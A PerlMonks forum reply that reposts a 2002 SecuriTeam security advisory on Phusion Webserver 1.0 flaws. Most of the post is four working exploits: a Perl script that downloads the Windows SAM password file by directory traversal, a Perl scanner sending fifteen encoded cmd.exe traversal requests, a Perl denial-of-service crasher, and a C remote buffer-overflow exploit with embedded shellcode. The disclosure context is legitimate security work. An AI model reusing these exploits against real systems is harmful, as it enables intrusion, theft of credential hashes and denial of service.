Beefy Boxes and Bandwidth Generously Provided by pair Networks
more useful options
 
PerlMonks  

Re: Apache(Perl?) error

by Anonymous Monk
on Jan 31, 2003 at 15:49 UTC ( [id://231648]=note: print w/replies, xml ) Need Help??


in reply to Apache(Perl?) error

http://www.der-keiler.de/Mailing-Lists/Securiteam/2002-02/0104.html 
     
Home > Mailing-Lists > Securiteam > 2002-02   Newsgroups   Recommendat
+ions   Privacy    [NT] Phusion Webserver File Viewing, DoS and Arbitr
+ary Code Execution Vulnerabilities
From: support@securiteam.com
Date: 02/17/02 

Previous message: support@securiteam.com: "[UNIX] MPG123 Local Buffer 
+Overflow Vulnerability (Command Line)" 
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attac
+hment ] 

----------------------------------------------------------------------
+----------


From: support@securiteam.com
To: list@securiteam.com
Date: Sun, 17 Feb 2002 10:51:46 +0100 (CET)


The following security advisory is sent to the securiteam mailing list
+, and can be found at the SecuriTeam web site: http://www.securiteam.
+com 
- - promotion 


When was the last time you checked your server's security? 
How about a monthly report? 
http://www.AutomatedScanning.com - Know that you're safe. 
- - - - - - - - - 




  Phusion Webserver File Viewing, DoS and Arbitrary Code Execution 
Vulnerabilities 
----------------------------------------------------------------------
+-- 


SUMMARY 


 <http://www.bbshareware.com/> Phusion Webserver Server is an Webserve
+r 
for Windows 9x/NT/2000. Multiple security vulnerabilities have been fo
+und 
in the product that allow remote attackers to launch a denial-of-servi
+ce, 
retrieve files that reside outside the normal HTTP bounding directory,
+ 
overflow an internal buffer causing it to execute arbitrary code, and 
execute arbitrary commands (via a directory traversal bug). 


DETAILS

[download]

Vulnerable systems: 
Phusion Webserver version 1.0 


Directory Traversal: 
The security vulnerability is exploitable by using a specially crafted
+ URL 
composed of triple dot ".../" directory traversal sequences, with HTTP
+ 
encoded character representations substituted for "/" and "\". 


Example: 
http://www.example.com/.../.../.../.../test.txt 


DoS attack: 
The server crashes after receiving a very long URL: 


Example: 
http://10.0.0.1/cgi-bin/AAAAAAAAA...(Ax2500)...AAA 


Buffer overflow: 
By issuing a long GET HTTP request, it is possible to cause the produc
+t to 
overflow an internal buffer causing it to execute arbitrary commands: 


Example: 
http://10.0.0.1/AAAAAAAAA...(Ax2500)...AAA 


Arbitrary command execution: 
By using a GET HTTP request prefixed with a '/cgi-bin/' directory it i
+s 
possible to execute arbitrary command by requesting the 'cmd.exe' 
executable (similar to the IIS security vulnerability). 


Example: 
http://10.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ 


Exploit (Directory Traversal): 
#!/usr/bin/perl 
# 
# THIS SCRIPT ONLY FOR WINDOWS WITH PERL OR CYGWIN 
# 
# Simple script to get files on server. 
# 
# Maybe u need this line for windows: 
# #! c:\perl\bin\perl.exe 
# 
# Phusion Webserver v1.0 proof-of-concept exploit. 
# By Alex Hernandez <al3xhernandez@ureach.com> (C)2002. 
# 
# Thanks all the people from Spain and Argentina. 
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, 
# G.Maggiotti & H.Oliveira. 
# 
# 
# Usage: perl -x Phusion-GET.pl <And read the Intructions> 
# 
# 



print("\nPhusion Webserver v1.0 GET Files exploit (c)2002.\n"); 
print("Alex Hernandez al3xhernandez\@ureach.com\n\n"); 



print <<"EOT"; 
Please type the address remote webserver, example: www.whitehouse.gov 
[Default remote Webserver is "127.0.0.1"`]: 
EOT 
$host = <>; 


print <<"EOT"; 
Please type only in the directory where the file is located you want t
+o 
download, 
example: /winnt/repair/ 
[default directory is "/winnt/repair/"] :#For IIS 4-5 
EOT 
$directory = <> || "/winnt/repair/"; 



print <<"EOT"; 
Please type in the filename you want download example: sam._ 
[default file is "sam._"] : 
EOT 
$file = <> || "sam._"; 


{ 
#Maybe u to change this line depending of PATH installation. 
system("explorer.exe", "http://$host:80/../../..$directory$file"); 
} 


print <<"EOT"; 
HAVE Fun!. ;-) 
EOT 


Exploit (Directory Traversal, Command Execution): 
#!/usr/bin/perl 
# 
# Simple script to identify if the host is vulnerable!, 
# 
# This does 15 different checks based IIS 4-5. Have Fun! 
# 
# Phusion Webserver v1.0 proof-of-concept exploit 
# By Alex Hernandez <al3xhernandez@ureach.com> (C)2002. 
# 
# Thanks all the people from Spain and Argentina. 
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, 
# G.Maggiotti & H.Oliveira. 
# 
# 
# Usage: perl -x Phusion_exp.pl <Hosts>:<Port> 
# 
# Example: 
# 
# perl -x Phusion_exp.pl www.whitehouse.com:80 
# Trying..................... 
# 
# <THIS HOST IS VULNERABLE> :-) 
# Check the previous notes to execute bugs. 
# 
# 


use Socket; 


if ($#ARGV<0) {die " 
\nPhusion Webserver v1.0 traversal exploit(c)2002. Alex Hernandez 
al3xhernandez\@ureach.com\n 


Usage: perl -x $0 www.whitehouse.com:80 {OR}\n [if the host is not usi
+ng a 
proxy]\n 
Usage: perl -x $0 127.0.0.1:80\n\n";} 


($host,$port)=split(/:/,@ARGV[0]); 
print "Trying.....................\n"; 
$target = inet_aton($host); 
$flag=0; 


# ---------------test method 1 
my @results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c
++dir 
HTTP/1.0\r\n\r\n"); 
foreach $line (@results){ 
 if ($line =~ /Directory/) {$flag=1;}} 


# ---------------test method 2 
my @results=sendraw("GET 
/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"); 
foreach $line (@results){ 
 if ($line =~ /Directory/) {$flag=1;}} 


# ---------------test method 3 
my @results=sendraw("GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c
++dir 
HTTP/1.0\r\n\r\n"); 
foreach $line (@results){ 
 if ($line =~ /Directory/) {$flag=1;}} 


# ---------------test method 4 
my @results=sendraw("GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c
++dir 
HTTP/1.0\r\n\r\n"); 
foreach $line (@results){ 
 if ($line =~ /Directory/) {$flag=1;}} 


# ---------------test method 5 
my @results=sendraw("GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c
++dir 
HTTP/1.0\r\n\r\n"); 
foreach $line (@results){ 
 if ($line =~ /Directory/) {$flag=1;}} 


# ---------------test method 6 
my @results=sendraw("GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c
++dir 
HTTP/1.0\r\n\r\n"); 
foreach $line (@results){ 
 if ($line =~ /Directory/) {$flag=1;}} 



# ---------------test method 7 
my @results=sendraw("GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c
++dir 
HTTP/1.0\r\n\r\n"); 
foreach $line (@results){ 
 if ($line =~ /Directory/) {$flag=1;}} 


# ---------------test method 8 
my @results=sendraw("GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c
++dir 
HTTP/1.0\r\n\r\n"); 
foreach $line (@results){ 
 if ($line =~ /Directory/) {$flag=1;}} 



# ---------------test method 9 
my @results=sendraw("GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c
++dir 
HTTP/1.0\r\n\r\n"); 
foreach $line (@results){ 
 if ($line =~ /Directory/) {$flag=1;}} 


# ---------------test method 10 
my @results=sendraw("GET 
/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"
+); 
foreach $line (@results){ 
 if ($line =~ /Directory/) {$flag=1;}} 


# ---------------test method 11 
my @results=sendraw("GET 
/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0\r\n\r\n"); 
foreach $line (@results){ 
 if ($line =~ /Directory/) {$flag=1;}} 


# ---------------test method 12 
my @results=sendraw("GET 
/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0\r\n\r\n"); 
foreach $line (@results){ 
 if ($line =~ /Directory/) {$flag=1;}} 


# ---------------test method 13 
my @results=sendraw("GET 
/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0\r\n\r\n"); 
foreach $line (@results){ 
 if ($line =~ /Directory/) {$flag=1;}} 


# ---------------test method 14 
my @results=sendraw("GET 
/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../ 
winnt/system32/cmd.exe\?/c\+dir 
HTTP/1.0\r\n\r\n"); 
foreach $line (@results){ 
 if ($line =~ /Directory/) {$flag=1;}} 


# ---------------test method 15 
my @results=sendraw("GET /.../.../.../.../winnt/system32/cmd.exe\?/c\+
+dir 
HTTP/1.0\r\n\r\n"); 
foreach $line (@results){ 
 if ($line =~ /Directory/) {$flag=1;}} 


#------------------------------ 
if ($flag==1){print "<THIS HOST IS VULNERABLE> :-)\n 
Check the previous notes to execute bugs\n";} 
else {print "<THIS HOST IS NOT VULNERABLE> :-( \n 
Check manually on browser...\n";} 



sub sendraw { 
        my ($pstr)=@_; 
        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || 
                die("Socket problems\n"); 
        if(connect(S,pack "SnA4x8",2,$port,$target)){ 
                my @in; 
                select(S); $|=1; print $pstr; 
                while(<S>){ push @in, $_;} 
                select(STDOUT); close(S); return @in; 
        } else { die("Can't connect check the port or address...\n"); 
+} 
} 


Exploit (DoS): 
#!/usr/bin/perl 
# 
# Simple script to send a long 'A^s' command to the server, 
# resulting in the server crashing. 
# 
# Phusion Webserver v1.0 proof-of-concept exploit. 
# By Alex Hernandez <al3xhernandez@ureach.com> (C)2002. 
# 
# Thanks all the people from Spain and Argentina. 
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, 
# G.Maggiotti & H.Oliveira. 
# 
# 
# Usage: perl -x Phusion_DoS.pl -s <server> 
# 
# Example: 
# 
# perl -x Phusion_DoS.pl -s 10.0.0.1 
# 
# Crash was successful ! 
# 


use Getopt::Std; 
use IO::Socket; 


print("\nPhusion Webserver v1.0 DoS exploit (c)2002.\n"); 
print("Alex Hernandez al3xhernandez\@ureach.com\n\n"); 


getopts('s:', \%args); 
if(!defined($args{s})){&usage;} 


($serv,$port,$def,$num,$data,$buf,$in_addr,$paddr,$proto); 


$def = "A"; 
$num = "3000"; 
$data .= $def x $num; 
$serv = $args{s}; 
$port = 80; 
$buf = "GET /cgi-bin/$data /HTTP/1.0\r\n\r\n"; 



$in_addr = (gethostbyname($serv))[4] || die("Error: $!\n"); 
$paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n"); 
$proto = getprotobyname('tcp') || die("Error: $!\n"); 


socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!"); 
connect(S, $paddr) ||die ("Error: $!"); 
select(S); $| = 1; select(STDOUT); 
print S "$buf"; 



print("\nCrash was successful !\n\n"); 


sub usage {die("\n\nUsage: perl -x $0 -s <server>\n\n");} 


Exploit (Buffer overflow): 
/** Phusion-Overun.c 
** -Remote exploit for Phusion Webserver v1.0 for WinNT. 
** 
** Phusion Webserver v1.0 exploit gets remote servers's full control. 
** When you attacks a vulnerable server you can run abitrary code 
** inside. 
** 
** Phusion Webserver v1.0 proof-of-concept exploit. 
** By Alex Hernandez <al3xhernandez@ureach.com> (C)2002. 
** 
** Thanks all the people from Spain and Argentina. 
** Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, 
** G.Maggiotti & H.Oliveira. 
** 
** 
** Compile: gcc -o Phusion-ovrun Phusion-ovrun.c 
** 
** Usage: ./Phusion-ovrun <hostname> 
** 
** 
** 
** 
**/ 



#include <stdio.h> 
#include <unistd.h> 
#include <sys/socket.h> 
#include <netinet/in.h> 
#include <sys/errno.h> 
#include <netdb.h> 


#define _PORT 80 
#define _X 10000 


char runcrash[] = 
"GET /" 
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 
"\x90\x90\x90\x90\x90\x81\xc7\xc8\x10\x10\x10\x81\xef\x10" 
"\x10\x10\x10\x57\x5e\x33\xc0\x66\xb8\x31\x02\x90\x90\x50" 
"\x59\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99\xc4\x18" 
"\x74\xb1\x89\xd9\x99\xf3\x99\xf1\x19\x99\x99\x99\xf3\x9b" 
"\xf3\x99\xf3\x99\xf1\x99\x99\x99\xd9\x14\x2c\xac\x8b\xd9" 
"\x99\xcf\xf1\x19\x02\xd4\x99\xc3\x66\x8b\xc9\xc2\xf3\x99" 
"\x14\x24\x3a\x89\xd9\x99\xaa\x59\x32\x14\x2c\x3a\x89\xd9" 
"\x99\xcf\xf1\xd3\x98\x99\x99\x09\x14\x2c\x72\x89\xd9\x99" 
"\xcf\xca\xf1\x49\x05\xd4\x99\xc3\x66\x8b\xca\xf1\x05\x02" 
"\xd4\x99\xc3\x66\x8b\xf1\xa9\xd4\xde\x99\xc6\x14\x2c\x3e" 
"\x89\xd9\x99\xf3\xdd\x09\x09\x09\x09\xc0\x35\x33\x7b\x65" 
"\xf3\x99\x23\x31\x02\xd4\x99\x66\x8b\x99\x99\x99\x99\xca" 
"\xfc\xeb\xef\xfc\xeb\xb9\xf1\xf8\xfa\xf2\xfc\xfd\xb7\xa5" 
"\xb6\xf1\xab\xa7\xf1\xed\xed\xe9\xa3\xb6\xb6\xee\xee\xee" 
"\xb7\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\xfe\xb9" 
"\xb9\xca\xe9\xf5\xf6\xf0\xed\xb9\xfa\xf6\xfd\xfc\xfd\xb9" 
"\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9\xe4\xa3\xb0\xa5\xf1\xed" 
"\xf4\xf5\xa7\xa5\xf1\xfc\xf8\xfd\xa7\xa5\xed\xf0\xed\xf5" 
"\xfc\xa7\xca\xfc\xeb\xef\xfc\xeb\xb9\xf1\xf8\xfa\xf2\xfc" 
"\xfd\xb7\xa5\xb6\xed\xf0\xed\xf5\xfc\xa7\xa5\xb6\xf1\xfc" 
"\xf8\xfd\xa7\xa5\xfb\xf6\xfd\xe0\xa7\xa5\xfa\xfc\xf7\xed" 
"\xfc\xeb\xa7\xd1\xfc\xf5\xf5\xf6\xb7\xb9\xc0\xf6\xec\xb9" 
"\xf8\xeb\xfc\xb9\xeb\xec\xf7\xf7\xf0\xf7\xfe\xb9\xf8\xb9" 
"\xc3\xdb\xca\xfc\xeb\xef\xfc\xeb\xb9\xc9\xcb\xd6\xea\xb9" 
"\xfb\xec\xfe\xfe\xe0\xb9\xef\xfc\xeb\xea\xf0\xf6\xf7\xb9" 
"\xf8\xf7\xfd\xb9\xe0\xf6\xec\xb9\xf1\xf8\xef\xfc\xb9\xfb" 
"\xfc\xfc\xf7\xb9\xf8\xfb\xec\xea\xfc\xfd\xb7\xa5\xe9\xa7" 
"\xd4\xf6\xeb\xfc\xb9\xf0\xf7\xff\xf6\xeb\xf4\xf8\xed\xf0" 
"\xf6\xf7\xb9\xfa\xf8\xf7\xb9\xfb\xfc\xb9\xfd\xf6\xee\xf7" 
"\xf5\xf6\xf8\xfd\xb9\xff\xeb\xf6\xf4\xb9\xf1\xed\xed\xe9" 
"\xa3\xb6\xb6\xee\xee\xee\xb7\xfd\xfc\xfc\xe9\xe3\xf6\xf7" 
"\xfc\xb7\xf6\xeb\xfe\xb9\xf6\xeb\xb9\xf1\xed\xed\xe9\xa3" 
"\xb6\xb6\xf4\xf8\xeb\xfc\xf8\xea\xef\xf0\xef\xf8\xea\xb7" 
"\xfa\xf3\xfb\xb7\xf7\xfc\xed\xa5\xe9\xa7\xeb\xfc\xfe\xf8" 
"\xeb\xfd\xea\xb9\xed\xf6\xb9\xdd\xfc\xfc\xe9\xc3\xf6\xf7" 
"\xfc\xb9\xfa\xeb\xfc\xee\xb9\xb1\xcd\xf1\xfc\xce\xf0\xe3" 
"\xf8\xeb\xfd\xb5\xb9\xd8\xf7\xec\xea\xf2\xf8\xb9\xf8\xf7" 
"\xfd\xb9\xd7\xfc\xf4\xf6\xb0\xa5\xe9\xa7\xda\xf6\xfd\xfc" 
"\xfd\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb7\xa5\xb6\xfa\xfc" 
"\xf7\xed\xfc\xeb\xa7\xa5\xb6\xfb\xf6\xfd\xe0\xa7\xa5\xb6" 
"\xf1\xed\xf4\xf5\xa7\xb7\xc5\xf1\xed\xf4\xf5\xc5\xca\xfc" 
"\xeb\xef\xfc\xeb\xd8\xfb\xec\xea\xfc\xfd\xfb\xe0\xf0\xc3" 
"\xf8\xf7\xb7\xf1\xed\xf4\xf5\x99\x90\x90\x90\x90\x90\x90" 
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 
"\x90\x90\x90\x90\x90\xac\xe0\xe3\x01"; 



int sock; 
struct sockaddr_in sock_a; 
struct hostent *host; 


int main (int argc, char *argv[]) { 


printf("\nWinNT 4.0 sp5 Phusion Webserver v1.0 BufferOverrun exploit\n
+"); 
printf("Alex Hernandez al3xhernandez@ureach.com\n\n"); 


if(argc < 2) { 
   fprintf(stderr, "Error : Usage: %s <hostname> \n", argv[0]); 
   exit(0); 
  } 



if((host=(struct hostent *)gethostbyname(argv[1])) == NULL) { 
    perror("gethostbyname"); 
    exit(-1); 
  } 


if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) { 
    perror("create socket"); 
    exit(-1); 
  } 


sock_a.sin_family=AF_INET; 
sock_a.sin_port=htons(_PORT); 
memcpy((char *)&sock_a.sin_addr,(char *)host->h_addr,host->h_length); 
if(connect(sock,(struct sockaddr *)&sock_a,sizeof(sock_a))!=0) { 
    perror("create connect"); 
    exit(-1); 
  } 


  fflush(stdout); 


  write(sock,runcrash,_X); 
  write(sock,"\n\n", 2); 
  printf("done.\n\n"); 
} 



ADDITIONAL INFORMATION 


The information has been provided by <mailto:al3xhernandez@ureach.com>
+ 
Alex Hernandez. 




======================================== 



This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and
+ body to: list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email t
+o: list-subscribe@securiteam.com 



==================== 
==================== 


DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty 
+of any kind. 
In no event shall we be liable for any damages whatsoever including di
+rect, indirect, incidental, consequential, loss of business profits o
+r special damages. 




----------------------------------------------------------------------
+----------

Previous message: support@securiteam.com: "[UNIX] MPG123 Local Buffer 
+Overflow Vulnerability (Command Line)" 
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attac
+hment ] 
 
Home > Mailing-Lists > Securiteam > 2002-02   Newsgroups   Recommendat
+ions   Privacy    
----------------------------------------------------------------------
+----------
Contact: security@der-keiler.de 
This document was last modified: 10/13/02 01:49 CEST 

----------------------------------------------------------------------
+----------
Thanks:
According to Alexa.com, www.der-keiler.de is now one of the 100.000 mo
+st visited sites on the internet.
We would like to thank all faithful visitors who made this possible.

[download]

In Section Seekers of Perl Wisdom

Log In?
Username:
Password:

What's my password?
Create A New User
Domain Nodelet?

www.com | www.net | www.org
Node Status?
node history
Node Type: note [id://231648]
help
Chatterbox?
and the web crawler heard nothing...

How do I use this?Last hourOther CB clients
Other Users?
Others meditating upon the Monastery: (6)
As of 2024-04-23 20:36 GMT
Sections?
Information?
Find Nodes?
Leftovers?
    Voting Booth?

    No recent polls found